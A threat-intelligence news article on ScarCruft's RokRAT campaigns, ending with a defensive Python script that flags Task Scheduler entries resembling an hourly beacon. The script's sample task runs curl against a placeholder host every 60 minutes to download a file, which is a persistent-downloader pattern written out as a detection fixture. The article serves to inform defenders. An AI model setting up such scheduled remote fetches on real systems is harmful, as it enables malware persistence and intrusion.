N. Korean ScarCruft Hackers Exploit LNK Files to Spread RokRAT

June 1, 2023 | Ravi Lakshmanan | Cyber Threat / Malware


Cybersecurity researchers have taken a closer look at a remote access Trojan called RokRAT, which is being used by the North Korean state-sponsored threat actor known as ScarCruft.

“RokRAT is a sophisticated remote access Trojan (RAT) that has been observed as a key component in the attack chain, allowing attackers to gain unauthorized access, steal sensitive information, and potentially maintain persistent control over compromised systems,” said ThreatMon.

ScarCruft, active since at least 2012, is a cyber espionage group operating on behalf of the North Korean government and focused almost exclusively on targets in South Korea.

The group is believed to be a unit within North Korea’s Ministry of State Security (MSS). Its attack chains rely heavily on social engineering to spear-phish victims and deliver payloads to the targeted networks.

This has included exploiting a vulnerability in Hancom’s Hangul Word Processor (HWP), productivity software widely used by public and private organizations in South Korea, to distribute its signature malware, RokRAT.


The Windows backdoor, also known as DOGCALL, is actively developed and maintained, and has since been ported to other operating systems such as macOS and Android.

As documented by the AhnLab Security Emergency Response Center (ASEC) and Check Point, recent spear-phishing attacks used LNK files to trigger a multi-stage infection sequence that ultimately led to the deployment of the RokRAT malware.


RokRAT allows attackers to collect system metadata, take screenshots, execute arbitrary commands received from remote servers, enumerate directories, and extract targeted files.

This development follows ASEC’s disclosure of a ScarCruft attack that uses a Windows executable masquerading as a Korean document to drop malware configured to access an external URL every 60 minutes.

ASEC pointed out that “The URL registered in Task Scheduler looks like a normal homepage, but it contains a web shell.”
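The beaconing behaviour ASEC describes (a scheduled task that reaches out to an external URL every 60 minutes) can be hunted for in exported Task Scheduler definitions (`schtasks /query /xml`). The following Python is an added example written for this article, not ASEC’s or ThreatMon’s code; the task XML it parses is constructed to mimic that pattern, and the 30–120 minute window and the URL regex are assumptions a defender would tune.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample Task Scheduler export modelled on the behaviour described
# above (hourly repetition + an action that contacts a remote URL). Not a real IoC.
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT60M</Interval></Repetition>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\curl.exe</Command>
      <Arguments>-s http://example.invalid/index.php -o C:\\Users\\Public\\update.dat</Arguments>
    </Exec>
  </Actions>
</Task>"""

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def interval_minutes(iso_duration):
    """Convert the ISO-8601 duration Task Scheduler uses (PT1H, PT60M, P1D) into minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso_duration or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60

def assess_task(xml_text):
    """Return why the task looks like a periodic downloader/beacon, or {} if it does not."""
    root = ET.fromstring(xml_text)
    findings = {}
    # Any trigger that repeats at an hourly-ish cadence matches the beacon pattern.
    for interval in root.findall(".//t:Triggers/*/t:Repetition/t:Interval", NS):
        mins = interval_minutes(interval.text)
        if mins is not None and 30 <= mins <= 120:
            findings["repeat_minutes"] = mins
    # An Exec action whose command line embeds a remote URL is the fetch stage.
    for exe in root.findall(".//t:Actions/t:Exec", NS):
        cmdline = " ".join([exe.findtext("t:Command", default="", namespaces=NS),
                            exe.findtext("t:Arguments", default="", namespaces=NS)])
        if URL_RE.findall(cmdline):
            findings["urls"] = URL_RE.findall(cmdline)
    # Either trait alone is common in benign tasks; report only the combination.
    return findings if {"repeat_minutes", "urls"} <= findings.keys() else {}
```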
